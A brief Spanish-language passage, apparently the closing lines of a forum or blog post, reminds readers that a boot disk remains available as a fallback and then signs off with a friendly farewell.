lo que os pasé, siempre os quedará el disco de arranque!!! (Booteo) ;)
CUIDAROS TODOS Y HASTA OTRA!!!




